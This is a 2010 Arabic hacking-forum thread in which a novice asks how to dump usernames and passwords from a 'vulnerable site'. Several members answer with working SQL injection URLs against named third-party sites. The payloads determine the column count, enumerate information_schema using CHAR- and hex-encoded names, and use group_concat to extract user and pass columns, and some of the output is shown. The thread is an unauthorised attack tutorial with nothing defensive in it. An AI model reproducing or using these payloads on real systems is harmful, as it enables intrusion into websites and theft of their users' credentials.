الى الاخ هون أرعص

الركن المظلم · 07-18-2010, 02:14 AM

يسم الله الرحمن الرحيم
السلام عليكم ورحمه الله وبركاته

الا يا الغالي أنا سويت مثل ما قلت
ذهبت الى موقع مصاب وظعت علامه '
وضهر الخطأ بعدها أظفت قبل المتغير علامه -
وبعدها أظفت
-- Union Select 1,2,3,4,5
حتى وصلت الى عدد الاعمدهـ
وطلع لي بالعنوان رقم 3
أنا أبغى أطلع اليوزر والباس
تقدر تفيدني
وجزاك الله الف خير

علما اني جر بت أحط يوزر وباسبورد بالانجليزي يطلع خطا
smilies3

المصدر: :: vBspiders Professional Network ::

Vspan style="font-weight: bold; color: #ff0000;"Cydv l[hf:VLspanC hgn hgho i,k Hvuw

DannY.IraQi · 07-18-2010, 09:34 AM

تابع دورة الاخ فوكانو

-------------------------------

طيب جرب الامر هذا @@version

لمعرفه اصدار القاعدة ! ورد لي خبر على شان بقدر اساعدك @!

الركن المظلم · 07-18-2010, 11:55 AM

يا الغالي

أنا فهمت الطريقه
وطبقت الاوامر
لاكن المشكله
عمود الباسبورد
وعمود اليوزر
ما عم تطلع

أول شيء
http://www.cdvdcenter.com/zcat.php?id=-1 Union Select 1,2,3,4,5,6,7,8,9 -

بعدين طلع العمود المصاب موب بالصفحه في لب الصفحه في العنوان يعني

بعدين طلعنا عمود اليوزر طلع
cdvdcenter.com:.member:id:sidividice_cdvd

يعني id

طيب

pass عمود الباس

التطبيق راح يكون كذا
http://www.cdvdcenter.com/zcat.php?id=-1 Union Select 1,2, Concat(id,0x3a,pass),4,5+from+member --

بس ما طلع شيء
لا يوزر ولا باس

وش الحل ؟
ومشكور

hklv · 07-18-2010, 12:04 PM

الحقيقه الي طلعت عندي عدد الأعمدة 5 وليست 9 !

والعمود المصاب ما ظهر يطلع لي

The used SELECT statements have a different number of columns

لعلى وعسى أن تكون مرقعة

الركن المظلم · 07-18-2010, 12:15 PM

صح يا الغالي 5 أعمده لاكن أنا نسختها بهدف وصول الفكرهـ

الركن المظلم · 07-18-2010, 12:39 PM

[align=right]ركزو بذي وشوفو وش المشكله

أول شيء

http://www.arzuntarin.com/zcat.php?id=-1
^
موقع مصاب بالعمود 3
له خمس أعمده
http://www.arzuntarin.com/zcat.php?id=-1 UNION SELECT 1,2,3,4,5

أول شيء نطلع الاصدار طلع 5

بعدين
نحط الاوامر ع الرابط

كذا
http://www.arzuntarin.com/zcat.php?i...schema.columns

بعدين نحط الامر
نظيف الامر
(where+column_name+LIKE+CHAR(37, 112, 97, 115, 37

طلع لنا

.: Arzuntarin.com - user:pass:arzuntarin_new :.

طيب نطبق الامر الثاني

where+table_name = 0x75736572

طلع لنا

.: Arzuntarin.com - user:id:arzuntarin_new :.

حطينا

http://www.arzuntarin.com/zcat.php?i...ema.columns%20

في مشكله أو لا
[/align]

TIKTAKram · 07-18-2010, 09:23 PM

أهلا أخي الكريم بك معنا

مشكلتك بسيطة و سببها عدم التركيز كباقي أصدقائك

المهم...! راح أشرح لك المشكلة و أعطيك الحقنة الصحيحة

أنت في الأخير وضعت هكذا :

كود:

 http://www.arzuntarin.com/zcat.php?id=-1%20UNION%20SELECT%201,2,Concat%28id,0x3a,pass%29,4,5+from+information_schema.columns

و هذا خطأ كبير جدا، أنت ما حددت من وين يستخرج اليوزر والباس يعني ما حددت الجدول

يعني نسيت أن تضع FROM+xxx

مثلا في هذه الحالة نضع FROM+USER في آخر الحقنة

المهم...! الآن ! حتى لو نضع هذا سوف يظهر رقم 1 و الباس

و بالتأكيد الرقم 1 ليس اليوزر لأنه الـ ID لذلك سوف نرجع شوي في الحقنة و نضع الأمر group_concat()

و من الأمر سوف نستنتج أن إسمع عمود الـ USER هو USER

يعني الحقنة الأخيرة و التامة و النظيفة هذه هي :

كود:

 http://www.arzuntarin.com/zcat.php?id=-1%20union%20select%201,2,concat%28id,0x3a,user,0x3a,pass%29,4,5+from+user--

بالتوفيق و إن شاء الله أكون قد ساعدتك و في المرة المقبلة ركز أكثر

و بدي أعطيك نصيحة ( أعد مشاهدة الدروس من أول درس )

بالتوفيق

Dr.NaNo · 07-18-2010, 10:06 PM

لحضه اخي الغالي لا تستعجل انت لخبط كثير كثيرر ..

الحين اشرحها لك .

Dr.NaNo · 07-18-2010, 10:11 PM

اولا. شوف الرد على استفسارك هذا يمكن تعرف الخطــأ الي سويته ..

يا شباب بليز أرجو المساعده

hklv · 07-18-2010, 10:15 PM

يعطيكم ربي الف عافيه ،

Dr.NaNo · 07-18-2010, 10:31 PM

نبدا.:

عدد االاعمدة المصابه .: 5

نوع اصدار قاعدة البيانات .: 5

http://www.cdvdcenter.com/zcat.php?i...on%28%29,4,5--

شوف الخطـأ طلع لك فووق في راس الصفحه في التوتيل ..

تمام ..

الان لحظ جداول الباسورد في هذا الرابط ...:

http://www.cdvdcenter.com/zcat.php?id=-1 union select 1,2,group_Concat(table_name,0x3a,column_name,0x3a, table_schema),4,5+from+information_schema.columns+ where+column_name+LIKE+CHAR(37, 112, 97, 115, 115, 37)--

member:pass:sidividice_cdvd
user:pass:sidividice_cdvd
لو تلاحط اني اضفت امر . group_ قبل كلمه ..Concat ؛ << في الحقنه ..

شوف الرابط الي فوق تبع الاستفسار الاول تبعك وبتعرف وش اقصد ..بإمر group_

لان هذا الامر بستخرج لك جميع الجداول ..

نتابع الحقنه .:

الان ناخذ من جداول الباسورد الي فوق ..ناخذ عمود user ونشفره ..بموقع .:

http://www.waraxe.us/sql-char-encoder.html

بعد التشفير بكون هيك الامر كامل في الموقع .:

http://www.cdvdcenter.com/zcat.php?id=-1 union select 1,2,group_Concat(table_name,0x3a,column_name,0x3a, table_schema),4,5+from+information_schema.columns+ where+table_name=0x75736572--

وهذه الاعمدة تبع اليوزر .:

user:id:sidividice_cdvd
user:user:sidividice_cdvd
user:pass:sidividice_cdvd

لاحظ في الرابط فوق تبع الحقنه يوجد امر group_ >> !! قلت لك الامر يجب في اي حقنه تستخدمه لكي تعرف الجداول ..

نكمل الان ونستخرج معلومات صاحب الموقع .:

لاحظ هنا الرابط .:

http://www.cdvdcenter.com/zcat.php?id=-1 union select 1,2,group_Concat(user,0x3a,pass),4,5+from+user--

سوف تجد اليوزر والباسورد تبع الموقع ..

لكن اليوزر لم يظهر لم اعرف لماذا ..

لكن اذا لم يظهر اذهب الى اعمدت الباسورد ..:

member:pass:sidividice_cdvd

وشفر كلمه
member ..

لان احنا فوق شفرنا كلمت user لكن لم يظهر اليوزر والباسورد معنا .

الان شفر كلمه memder وإن شاء الله يظهر معااك .. اليوزر والباسورد .

ملاحظــــة .:

لو تلاحظ في الرابط هذا تبعك ..:

http://www.arzuntarin.com/zcat.php?i...schema.columns

شوف خطــأ كبير عملته ياغالي ..

وهو انك جعلت امر information_schema.columns بعد كلمه from

وهكذا سوف يأتيك خطأ في الرابط ..

والصحيح هو اضافه بعد كلمت from عند استخراج اليوزر والباسورد ..

تضع بعد كلمه from الاسم الذي شفرته في موقع .:

http://www.waraxe.us/sql-char-encoder.html

شوف الرابط الصحيح هنا ..

http://www.cdvdcenter.com/zcat.php?id=-1 union select 1,2,group_Concat(user,0x3a,pass),4,5+from+user--

هكذا انا اقصد ..

إن شاء الله انك فهمتني وانا عارف انك لخبطت كثيررر وإحنا كنا مثلك نلخبط.

لكن ارجع اقولك ،، لا تستعجل في تحميل الدروس او الدورة كامله ..

في اليوم حمل درس .. وتابعه زيين زيين وطبق ...

واذا لم يضبط معك موقع [ ضعه جانبأآ في مفكره ] واستخدم موقع اخر ..

وهكذا . وإن شاء الله تحترف اخي الغالي ...

ملاحضـــة ايضــأ. :

ركز جيدأأ في الاوامر . الي بالحقن .. عشان تعرف كيف تستخرج اليوزر والباسورد.

تحياتي لك ..

اخوك .:

Dr.NaNo

بالتوفيق لك . اخي الغالي .

الركن المظلم · 07-18-2010, 11:59 PM

مشطورين وما تقصرون الشغل خطا حقي الحمد لله فهمت الفكرهـ يا حباني وربي وفيتكم وكفيتم لكم تحياتي

المواضيع المتشابهه
الموضوع	كاتب الموضوع	المنتدى	مشاركات	آخر مشاركة
موقع يعطيك معلومات عن صاحب الاي بي ...فقط ضع الاي بي	rayhant	قســم إختــراق الأجهــزة	179	08-22-2012 02:51 PM
الى الاخ زيرو	hacker-oziwa	جـــ'ابات العناكــ'ب	2	04-06-2010 04:50 PM
تثبيت الاي بي	ابو نايف	جـــ'ابات العناكــ'ب	0	02-10-2010 02:07 PM
[Product] : كاشف الاي بي IP الحقيقي للاعضاء (الجهاز) مع الاي بي IP الحقيقي للمستضيف (الاتصال)	xman2	قســم تطويــر المــــواقع	0	09-06-2009 05:01 AM

التواصل المباشر مع الادارة والاعضاء القدامى من خلال قناة التلغرام

الى الاخ هون أرعص

جـــ'ابات العناكــ'ب